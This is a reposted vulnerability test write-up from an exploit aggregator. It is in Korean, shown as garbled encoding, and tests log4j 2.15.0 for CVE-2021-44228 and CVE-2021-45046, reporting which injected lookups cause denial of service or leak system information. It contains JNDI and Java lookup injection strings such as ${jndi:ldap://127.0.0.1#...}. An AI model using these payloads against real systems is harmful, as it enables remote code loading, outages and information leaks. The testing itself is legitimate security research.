Share
## https://sploitus.com/exploit?id=0D243A34-B42E-5007-90D0-A30ECABDA204
log4j RCE (CVE-2021-44228)์ด 2.15์์ ํจ์น๋์์ง๋ง, CVE-2021-45046 (DoS ์ ๋ฐ) ์ทจ์ฝ์ ์ด ์๋ก ๋ฐ๊ฒฌ๋์์.
์๋๋ ํ
์คํธ ํด๋ณธ ๊ฒฐ๊ณผ.
[ํ
์คํธ ํ๊ฒฝ]
log4j-2.15.0 (api , core)
JRE-1.8.0
jdk1.8.0_151
Eclipse IDE (Maven Project)
1. Log4j RCE (CVE-2021-44228) ๊ตฌ๋ฌธ ํ
์คํธ -> Not Vuln
![image](https://user-images.githubusercontent.com/70466565/146639780-c2ccb224-b72b-462e-ba02-0c2045c7cb30.png)
2. ์์์ ctx ๊ฐ์ฒด๋ช
์ ์ฝ์
-> Not vuln
![image](https://user-images.githubusercontent.com/70466565/146639782-f24f8876-e954-42aa-a148-d32e1fb2eb9c.png)
3. context๋ฅผ ๋ฐ๋ ๊ฐ์ฒด์ ๋์ผํ ์ด๋ฆ์ผ๋ก ์ฝ์
ํ๋ ๊ฒฝ์ฐ -> infinite loop ๋ก DoS ๋ฐ์
![image](https://user-images.githubusercontent.com/70466565/146639787-aea999b8-e0ae-4106-be7b-04f70d1c933a.png)
4. ${jndi:ldap://127.0.0.1#[ldap ์๋ฒ ์ฃผ์]} ํํ๋ก ์ฝ์
-> UnknownHostException ๋ฐ์, DoS ๋ฏธ๋ฐ์
![image](https://user-images.githubusercontent.com/70466565/146639795-a6349de8-8bda-40ae-81df-85e59f21dea3.png)
5. jndi:ldap://[ldap์๋ฒ]#[ldap์๋ฒ] ํํ -> Not vuln
![image](https://user-images.githubusercontent.com/70466565/146639814-57b93e1d-4f00-4d3a-80a3-3c2987835657.png)
6. Java ์ฝ๋ ์ฝ์
-> illegalArgmumentException ์ผ๋ก DoS ๋ฐ์
![image](https://user-images.githubusercontent.com/70466565/146639850-ac43fe34-bb58-4563-9442-d8aaf8d03a98.png)
7-1. Java ๊ตฌ๋ฌธ ์ฝ์
-> System info exposure
![image](https://user-images.githubusercontent.com/70466565/146639820-137e5778-9997-4eb3-ac28-c5a079c8a1ff.png)
7-2. Java ๊ตฌ๋ฌธ ์ฝ์
->illegalArgmumentException , DoS ๋ฐ์
![image](https://user-images.githubusercontent.com/70466565/146639859-a0ac8422-7fca-476c-8bde-0f729d7a35b8.png)
-> illegalArgumentException ๋ฐ์ ์ง์ ํ์ธ ์ Switch case ๋ฌธ์ผ๋ก 2-5์์ System info exposure ๊ฐ๋ฅํ Java ๊ตฌ๋ฌธ (${java:version} ์
์๋๋ ๋ฃจํด์ผ๋ก ๋ณด์.
![image](https://user-images.githubusercontent.com/70466565/146639864-735dc8cf-cdd4-4448-ac85-08866e0fbcda.png)